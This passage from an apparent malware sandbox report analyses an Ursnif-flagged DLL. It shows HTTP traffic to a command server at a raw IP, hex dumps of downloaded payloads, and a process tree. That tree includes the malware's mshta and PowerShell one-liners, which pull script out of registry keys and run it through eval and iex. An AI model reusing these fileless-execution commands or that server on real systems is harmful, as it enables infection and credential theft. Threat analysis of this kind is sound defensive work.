                      Data Raw: 90 fe 16 00 dd 20 a6 90 00 22 81 96 31 0c 06 ee 2c a0 48 f2 36 47 2b a8 1f 78 fb 84 fe 80 bc 68 83 a3 b0 1b 36 53 4b 75 0f a7 82 72 a1 41 e1 ff 47 06 9d 2a 90 8e 26 f8 83 6e 4c 7a ba 23 11 cb 7a c4 b5 76 5c eb 93 5b 14 3c c9 98 a5 e3 8b c6 36 cc 13 99 54 83 1a 4c 7b 46 49 91 17 ea 3b bb 0c 41 7e bf 1b 94 ad a3 32 05 aa 3b b0 4f 0c cb fc da 60 91 e2 bd 0d 03 9d 3c bd a2 dd d7 3f 0f 94 dc e3 06 b6 33 92 7e 82 88 84 01 f1 a2 02 d5 be cd 05 f8 80 06 a7 6e 5b 13 39 e7 33 43 f9 ee 65 41 c1 09 48 5c 39 3b 96 45 42 2c d6 0e 26 1b 0d 07 a7 4a 31 10 18 b4 36 c2 cb 88 ce 0e 68 30 dd c9 12 ff 5a 51 b6 1f 27 30 1a 25 a6 fb 5f b1 43 86 48 4a be 41 1d 15 20 30 a1 22 5a 46 58 f9 15 cc 69 9f 79 f8 78 b2 f1 f4 64 27 68 96 aa c1 73 d4 a7 58 3d ff ca 94 06 f9 ff 3e aa d1 00 6e c4 9d 6b 43 ac 0c 73 10 7f 0a 46 6d a9 74 29 b7 65 25 b5 77 93 76 25 7a b8 d9 0d 9c 83 ab 02 b1 78 eb 7b 8d 01 61 4d 6f 2e 0a da b3 c7 26 36 df 2a 95 d4 bf df d3 28 b1 c4 44 91 f7 ed 03 59 40 3e 4e f4 f3 2c 45 08 6c ca 1e 96 ba cc 33 c6 d6 79 6e fe fc 1f 27 b2 8a 2c 3c 8b e3 b4 14 90 a6 c2 99 62 62 09 88 68 9b e5 5d 5a 1b 90 23 e3 3f 1e 37 65 79 84 54 e6 fa 2d 39 d0 ab 72 5f 30 51 17 b6 8d 50 6c f0 28 5a 7e 77 5d 4f e7 c7 d6 f5 10 1c e5 da 36 7b 84 8e 94 d4 b7 df fa ab aa 17 53 ac e3 5b b0 72 c2 c8 65 0a a1 68 34 7f bd db 5d 00 76 de 42 e5 35 53 61 1f b2 46 e4 5d b5 7e a8 1e 4b 28 b7 9d 61 42 3c ec 8f ef c7 31 1c 8f 4c 68 8c 93 db e0 4b 86 ff 36 5e 8b e5 b6 46 f3 43 2c c5 92 03 de c3 8a 33 76 52 de 17 e1 6a 06 82 43 9b 7d 58 a6 f9 59 d0 35 f8 22 ec 02 92 5f c2 94 98 f9 9c 96 72 7e 76 47 66 f2 a7 7b 29 58 64 8a b4 df fe fc 78 4c 1b 45 88 71 86 ab 44 26 65 5b 29 85 31 04 6f 88 9a 15 b6 69 e2 90 95 32 fe 62 fe a0 0f 8f 8d 27 8d d0 63 31 96 18 ad c3 68 6d 1c 70 e8 65 66 f8 3d 34 d6 fb 93 0e 68 95 ae 3f 77 85 3e f6 c2 fd bd a3 12 e3 f3 a6 45 7e 74 c5 8b 22 2b 46 9f b3 fb 84 39 cc c4 6e 5f 09 3e cf c2 0b 7a d8 1a a2 f7 8f d2 7c c9 c7 0a 86 fa 2f c2 c4 67 c1 14 c1 36 f4 7e ca 10 53 88 8f 87 0c 9a d8 40 02 b6 78 d9 3c 5d 0e 45 6d e7 1a 21 99 b0 29 1b e3 e0 c0 2b 02 47 bc 53 00 3c 8a 66 74 ca 12 c0 49 dc 75 43 18 6a 42 18 c7 9e 0b 55 fd 45 f0 5b 24 3a b5 3c 10 b5 a7 10 c7 28 d0 c7 35 3f 54 35 0e 43 41 1d bf f5 f3 9a f4 ff 81 26 48 fc 80 5f f1 f8 71 99 e4 0e 17 6a 1c 75 5d 64 95 f7 e1 88 a2 00 94 90 5f 6c d5 cd fc a5 72 b7 b6 e5 e8 5a 13 63 f5 4b b5 8e f2 82 41 64 7f ad 8e bd e9 6e 51 d0 ef ec 63 ab 78 09 ea e7 8c 71 e8 5b 12 a9 e1 0c 48 ed cb 06 da f3 7d ca 85 d7 45 2a 4b b1 c5 1c 9e 75 8e 33 0a 02 a8 57 71 0d b4 5c b3 46 dc 38 88 72 5b 66 00 55 4f 00 28 2c 61 67 7b 85 11 64 8c 84 de df 2f 2c 69 eb ba a7 86 a4 d1 ce df aa e3 93 48 d5 31 9a b5 8c e4 87 f9 e2 a0 e3 0c 04 b3 c4 40 f7 0f 35 de fc 0b d9 d3 2a 45 b4 91 93 26 51 19 8d f2 45 67 3b ed ed 42 e2 04 cd 3e 9c e7 c6 6f 15 1b aa 04 9e d3 e4 9f c4 7b 67 37 b7 40 48 05 e7 10 93 59 8a 81 f5 ca 77 22 e4 64 f5 a9 d5 0a 81 0e 53 8f c5 43 23 2d 3d 0f e4 a2 8a df c3 7b 13 3e 33 04 8c 56 2d 62 47 40 39 58 13 9c 69 1e b2 1f da 02 b7 59 0b d1 3e
                      Data Ascii: "1,H6G+xh6SKurAG*&nLz#zv\[<6TL{FI;A~2;O`<?3~n[93CeAH\9;EB,&J16h0ZQ'0%_CHJA 0"ZFXiyxd'hsX=>nkCsFmt)e%wv%zx{aMo.&6*(DY@>N,El3yn',<bbh]Z#?7eyT-9r_0QPl(Z~w]O6{S[reh4]vB5SaF]~K(aB<1LhK6^FC,3vRjC}XY5"_r~vGf{)XdxLEqD&e[)1oi2b'c1hmpef=4h?w>E~t"+F9n_>z|/g6~S@x<]Em!)+GS<ftIuCjBUE[$:<(5?T5CA&H_qju]d_lrZcKAdnQcxq[H}E*Ku3Wq\F8r[fUO(,ag{d/,iH1@5*E&QEg;B>o{g7@HYw"dSC#-={>3V-bG@9XiY>
                      May 4, 2022 16:28:12.829577923 CEST699OUTGET /drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLEhKaYvKzYG/62F8wcJNe79PrlqCY04/xwdKlEWPSs9w4mnPcT_2Ft/CBh9Jka_2BBO_/2FnUOsl_/2FeukB5Oo3R7waflgs2APeC/CflAOA3Y4e/fxy536Bj3MO1PfKKA/SIX3IKWM1adU/v_2FKt6MdMc/MqBgUjh6Lil97f/dDK979RFebXcHjW4yVEWU/DckDOUNWU_2FdK/Emn7xfA9.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 185.189.151.28
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      May 4, 2022 16:28:13.126252890 CEST700INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Wed, 04 May 2022 14:28:13 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 238738
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="62728d7d19b58.bin"
                      Data Raw: 3b 4c 6b f7 b7 25 70 03 88 2d 7a 37 9e a1 c8 64 0b d8 31 31 97 0f c5 b0 5f f3 81 6d 9e c3 45 83 0a 34 18 f9 2a 0e ff 72 ff c7 33 d5 29 5d 81 f6 a5 6c 33 59 c7 fc d9 7d 59 a6 2c 44 a0 08 b0 48 8b 5c 88 ed 4d 9c 4e f2 9c 04 cf da 87 8f fc 28 44 1b 1f d6 84 bb dc 53 47 f0 25 da f7 b6 56 48 26 5b 83 11 f9 80 79 d3 3f ab 3f 7b 8a 14 23 8f 4d 34 6e a5 8d 52 88 cb c6 51 bd 4e 27 49 d6 ba 33 30 b3 e5 52 76 59 f9 49 45 bb 09 82 03 75 7c e0 12 67 43 e1 33 8e b9 58 1e 5a b6 16 2b cf ae 0e 8d cd e6 c9 bb 31 32 9c b6 7f 38 ef b7 14 c5 6b 56 72 db db f5 20 42 b0 21 7b c2 d3 e4 6b fa b6 29 2f 63 6f 43 cf fd 33 d1 f1 f3 33 82 eb 56 90 92 b4 a4 9c 0b 34 10 8d ed df d7 30 79 ee 6a 70 e6 2e 5b 2f d9 bf ad 8c 81 5f ec d7 15 c8 85 f6 42 0f 37 b8 b0 93 ac a1 85 c4 23 5e e0 43 b2 f2 93 6a d4 39 18 f6 17 0d d7 36 b6 2c 4f 0e 34 06 73 fa a7 52 3b a0 32 82 5c f1 6b e4 7a 99 fc 8d 27 58 8a 96 1b 31 e8 14 ee 43 b7 d2 fb 67 09 cb 2e 03 64 ad e4 8a 6a 5f 40 27 ac a0 21 ac cd 7a c6 94 f3 0b 04 1c f4 15 03 a5 59 24 02 68 2c 35 6a 8b 51 d7 90 e5 d9 30 8a 7f dc c2 68 ae 3c 42 9a 5c 68 06 a5 c2 c4 6e 0f ef 64 32 4f 69 ab 18 b4 9e 99 1f f5 05 56 47 02 8e 9f 27 d4 ff 10 20 e7 ed cd b1 4b 87 6e 27 42 1e 3e 24 80 4a 04 3c a3 49 30 16 f6 80 ec ff 7f 69 7e 67 e9 15 f7 0c 8d 63 a1 52 09 e9 b1 0e 05 e9 aa 92 c3 6e a8 af a5 9b c3 81 03 f7 56 3b 62 cc 61 4a 47 01 5f 44 7c dd 73 98 b0 56 89 42 12 05 2f fd 1e 39 b9 f3 98 27 a9 28 d5 bc c4 8e a4 e7 ec ab 89 c4 ce 19 ea b9 9c 21 dc 88 24 ec 64 2b cb a0 eb bf ca ae d2 49 96 b6 8a 04 ab fa 95 77 fa 63 0a 7a 0d 95 a1 96 99 44 58 4c cf 57 ae a4 39 c8 34 1e 91 57 0a 36 63 09 ab 63 76 c2 c1 18 dd ac c2 70 bf 06 25 e6 27 5d fc f2 4f 2b 48 d4 2b 9b aa 75 25 b7 70 f5 86 3b 83 06 05 3f 10 6e 86 51 69 da a6 a8 0d 8f 67 9f 77 dd f3 f1 bc a3 2b 9b cc 07 3c cd d5 4d 2e 5b 8d 0a 6e f3 42 ee 85 31 81 12 49 42 23 da f6 e0 21 58 34 f1 98 44 20 e0 34 20 6c e2 a7 e9 96 39 bf 64 eb 96 ab af dd c2 e5 93 2f 77 12 5b 31 b6 d4 8e 98 e1 b0 b9 97 01 7b 07 2a 86 59 bd e8 00 a8 a3 36 12 48 2c f4 25 13 19 ba df bb ee 61 56 99 a8 ad 21 38 93 bd 47 26 58 af f0 db 46 7b b6 65 aa de cd dc 57 71 ed 57 29 3c a1 90 6f b4 ca a6 dc 2b a1 45 2a 15 3d 27 0d 14 ac e3 a7 f3 ce f4 a4 99 60 7c d7 95 79 41 ca 61 9a 6f 54 40 1a 4e 73 8d c8 57 85 c6 32 d8 e6 76 bd 9e 2b c8 77 57 64 55 68 1e e8 b8 ce e3 27 ea 88 e0 6b 84 d6 22 a8 40 53 1f fe fd 7f 2c 64 e5 e3 c0 ba b0 7c 8c 1f 0a 1f 3d a3 aa df 4c 84 66 69 de c4 52 16 4a cb 9d 1b 22 74 04 be b4 75 aa ac 10 43 9c 84 24 1d 8b bb 5b c6 a9 da 99 7a c4 10 3c d8 88 4e 6f 5d 84 05 33 69 2b e5 f6 16 bf 76 b7 e2 b7 61 1a 36 95 4b 28 79 75 83 0d af 82 36 39 fb e4 c0 3c c2 32 b4 cc c4 35 09 29 45 a8 bf a7 f5 c5 b1 91 71 b2 a5 a9 77 0d 1f 79 f3 f3 6c a3 ab 52 a9 26 9e df 64 d9 64 a6 4f 74 f8 7f be 12 b6 01 54 bd bc e1 a6 7e 85 e2 01 e7 11 f6 40 6c 49 4a e2 ec 18 e1 9b c7 7e 26 d7 09 41 4c b1 bd cb b6 91 c6 24 7f 1a 3d 1b 36 89 c0 c2 20 6c 33 01 13 79 75 f9 66 8c 40 13 41 38 66 3a 0f 9b 37 54 93 3b 5b 14 19 90 ea 68 99 54 78 3a f9 f4 73 f6
                      Data Ascii: ;Lk%p-z7d11_mE4*r3)]l3Y}Y,DH\MN(DSG%VH&[y??{#M4nRQN'I30RvYIEu|gC3XZ+128kVr B!{k)/coC33V40yjp.[/_B7#^Cj96,O4sR;2\kz'X1Cg.dj_@'!zY$h,5jQ0h<B\hnd2OiVG' Kn'B>$J<I0i~gcRnV;baJG_D|sVB/9'(!$d+IwczDXLW94W6ccvp%']O+H+u%p;?nQigw+<M.[nB1IB#!X4D 4 l9d/w[1{*Y6H,%aV!8G&XF{eWqW)<o+E*='`|yAaoT@NsW2v+wWdUh'k"@S,d|=LfiRJ"tuC$[z<No]3i+va6K(yu69<25)EqwylR&ddOtT~@lIJ~&AL$=6 l3yuf@A8f:7T;[hTx:s
                      May 4, 2022 16:28:13.314977884 CEST952OUTGET /drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQQf/vX4xXJ2IWlh9/BWCOo52VZG1/qFF3rGEbDGBwji/AFMqmR1WMmM5K0LIMoI8g/D8c5DrZSEGvsAUch/2HdMta1B0ffeRMZ/k3cTTdUk82uBVmy7RF/Rr_2FL2he/DujtrSekUisPa3nAIzJG/cz1155F97esi6v8egB5/_2FIb4A5CDY4_2BdVWbog2/rBYVbP7pL/9UBLZ.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 185.189.151.28
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      May 4, 2022 16:28:13.619457006 CEST954INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Wed, 04 May 2022 14:28:13 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 1856
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="62728d7d90c22.bin"
                      Data Raw: 9b a0 46 9f fb 74 7e 4c 02 9a 3e fd d9 71 c7 75 b7 c0 cf a4 f1 8f 69 7b ca 68 40 93 06 4e b2 61 6c 45 b6 60 ec c8 ae 61 ba a7 30 65 32 00 93 c4 61 b5 26 75 0f 9c 24 d6 6b 8d 49 83 bd 29 e5 c2 8e 84 e2 03 a7 53 8f 50 53 4e 60 d2 b0 83 79 b0 30 aa 56 2b de 37 b8 1e 29 a1 fe 12 f0 a4 8a b6 1c 50 54 8d e2 11 22 11 00 28 bf 5a 8e 88 5c f1 a5 ea 66 e4 d9 1d 25 32 3c 0d b9 88 74 8f 8e 4d dd 6f 8d 0c ff 3b fb ab 12 a8 aa 7b 3c 4a 84 d1 1c 81 c0 03 d3 5a f7 ca 0e 84 a2 cd bf 4b 4b 8a 9a a7 0b 3b 18 09 93 80 bd 2c 22 aa 10 18 d9 46 7f 3f 4a 98 a1 32 15 53 4d 52 37 e7 3d fc df 0b 99 86 dc 6e 28 45 31 41 af 5b f3 54 b8 c3 c4 0e de b4 8c 35 e7 ae 58 26 d9 51 48 2a a9 7c 38 bf 34 02 be a4 a2 60 c2 f2 a1 0b a5 b7 b8 45 00 65 8d 87 9e 0f 13 57 99 55 9c 6f 29 be 48 cb 2b 94 3e 15 dc a9 ca 66 19 e4 4b 96 5f 82 fb 25 15 6c e8 81 ba c7 c6 11 8f a6 22 f3 d3 46 8e 0a 4e a3 47 a3 43 c4 28 a9 04 8e 33 96 50 fc ff da 85 d8 1a 90 b6 c3 b6 70 00 35 37 e8 e0 9b 16 3a 8f 42 cc df f8 46 d9 65 92 fb a4 09 89 80 4b ed 32 53 0c fb 12 10 01 3c a7 65 18 1f 85 a3 3d 19 3b 35 60 ca 34 5d 34 52 31 52 97 a4 f7 e9 c8 a8 6d fd aa 00 d9 1a 03 b4 cf d3 6b 1d c9 a9 fb 98 be 9e ee 6e 98 aa dc 13 43 f5 f1 a4 c8 15 60 ac 89 bc 66 0e c3 5c 86 cf 87 08 78 b0 d7 93 ca a5 f3 d7 df 9f 82 0e 0c 47 f8 ba bb 22 96 1d 41 af ad 20 bb 3b f4 7c 43 d6 33 6b c5 a7 00 ad c7 e3 85 36 3d a9 cd ff 43 13 5d 1a 98 65 a5 39 a0 04 97 16 f2 aa 48 11 c3 92 11 ad e2 6c a1 be f1 26 93 a6 ac 32 e7 cb 42 6c f0 44 33 e2 1d 8e ae 3e b7 6c 0e 9d d6 61 ea 8a 3d 3b f9 10 d5 5e 6f e6 95 69 c6 71 9b d9 76 5a d7 a6 6d 73 3c 9c 16 98 fe 91 6c 22 21 a9 0d a3 b8 32 ec 0c e2 56 21 bd 0f b2 d9 7d 28 84 dc 5c 0a d0 73 cb ab bd 78 b6 e9 06 c7 a0 94 a6 59 4e d2 71 5b 21 08 5b 65 ac e4 58 76 1e 02 c8 9f 0d dd e0 90 25 a2 63 d5 df 0d 62 e9 e1 79 ab 4a 3b 73 dc 24 a2 34 4b 8e f7 84 e2 34 b7 48 aa f8 38 8e 40 82 ea 3e f7 65 c4 e9 55 1e 1c 09 eb 5f e8 d6 e0 be 03 c7 53 d9 7b 75 89 9d 91 ca e8 cf 8b fc 0e a2 1d 8b 29 79 32 6b ce 7d 50 cd 11 62 8e 9f e2 49 17 42 32 80 05 48 f4 b4 02 6d 95 48 d1 8f cf 58 79 80 88 10 83 25 2d 9c d3 a5 62 18 d5 cb e7 f6 ab c9 05 71 9d 97 91 57 12 95 83 e4 1e 21 ce 98 59 64 61 16 0c bc 86 44 3f 1e 63 85 6a b9 bb dc da c8 93 85 f0 15 ac 87 e7 0f bb 30 62 68 64 d9 35 20 8f a7 46 82 e0 bf e8 92 a0 37 1b 44 4e 09 c2 70 7b 5d ca 65 06 92 d7 1f 02 40 68 d8 f9 ce fe 22 b9 52 d6 37 3d 79 f5 4c bd 14 0c 30 6c e6 2b 48 c0 26 30 b8 43 9d de c8 55 66 eb 9d 88 ce 14 7f 49 50 c5 3f 64 97 0f 7a 4f 48 80 11 af 12 1c 95 66 bf ed ec e1 bd 12 35 7c da 51 24 8f b3 9f f8 1f 9b c0 d9 50 46 63 0f d2 4e 5c 43 00 32 a9 65 5a c3 30 73 8d 98 fa ff 3a 7d c3 b4 d5 ea d1 45 9c 4b 6c 69 1c f6 b4 3a 55 5c 5c 0e de 2a c7 47 93 6d ec 2b 02 99 c6 7b 5d ce 41 e3 ee c9 91 46 6e d4 10 d2 83 3e f6 91 b5 c3 ce d1 b9 12 29 94 e4 5a 7d ac dd 03 fc 4e 8f 4c 65 3e b6 12 c0 2b 6d 73 2a f6 b1 df bd a5 1d 5a 13 b6 7f a5 ca e1 33 ca 6b a4 88 3e c4 2e dd b1 9f 2c 6b 18 5e de cf fe 3b 59 3c 35 5f cf 58 4b 80 b6 2b aa 8f fe 2c ed d8 3b 2e 42 bb af 6f c1
                      Data Ascii: Ft~L>qui{h@NalE`a0e2a&u$kI)SPSN`y0V+7)PT"(Z\f%2<tMo;{<JZKK;,"F?J2SMR7=n(E1A[T5X&QH*|84`EeWUo)H+>fK_%l"FNGC(3Pp57:BFeK2S<e=;5`4]4R1RmknC`f\xG"A ;|C3k6=C]e9Hl&2BlD3>la=;^oiqvZms<l"!2V!}(\sxYNq[![eXv%cbyJ;s$4K4H8@>eU_S{u)y2k}PbIB2HmHXy%-bqW!YdaD?cj0bhd5 F7DNp{]e@h"R7=yL0l+H&0CUfIP?dzOHf5|Q$PFcN\C2eZ0s:}EKli:U\\*Gm+{]AFn>)Z}NLe>+ms*Z3k>.,k^;Y<5_XK+,;.Bo


                      Statistics

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:1
                      Start time:16:27:32
                      Start date:04/05/2022
                      Path:C:\Windows\System32\loaddll32.exe
                      Wow64 process (32bit):true
                      Commandline:loaddll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll"
                      Imagebase:0xa60000
                      File size:116736 bytes
                      MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:2
                      Start time:16:27:33
                      Start date:04/05/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                      Imagebase:0x1100000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:3
                      Start time:16:27:33
                      Start date:04/05/2022
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                      Imagebase:0x1360000
                      File size:61952 bytes
                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:high

                      General

                      Target ID:9
                      Start time:16:28:17
                      Start date:04/05/2022
                      Path:C:\Windows\System32\mshta.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kmli='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kmli).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Imagebase:0x7ff76df90000
                      File size:14848 bytes
                      MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:10
                      Start time:16:28:19
                      Start date:04/05/2022
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Imagebase:0x7ff619710000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:high

                      General

                      Target ID:11
                      Start time:16:28:20
                      Start date:04/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff77f440000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:14
                      Start time:16:28:36
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline
                      Imagebase:0x7ff6db380000
                      File size:2739304 bytes
                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:moderate

                      General

                      Target ID:15
                      Start time:16:28:38
                      Start date:04/05/2022
                      Path:C:\Windows\System32\control.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\control.exe -h
                      Imagebase:0x7ff79bdc0000
                      File size:117760 bytes
                      MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate

                      General

                      Target ID:16
                      Start time:16:28:38
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES109F.tmp" "c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP"
                      Imagebase:0x7ff7f0560000
                      File size:47280 bytes
                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:17
                      Start time:16:28:43
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline
                      Imagebase:0x7ff6db380000
                      File size:2739304 bytes
                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET

                      General

                      Target ID:18
                      Start time:16:28:48
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37BE.tmp" "c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP"
                      Imagebase:0x7ff7f0560000
                      File size:47280 bytes
                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                      Has elevated privileges:true
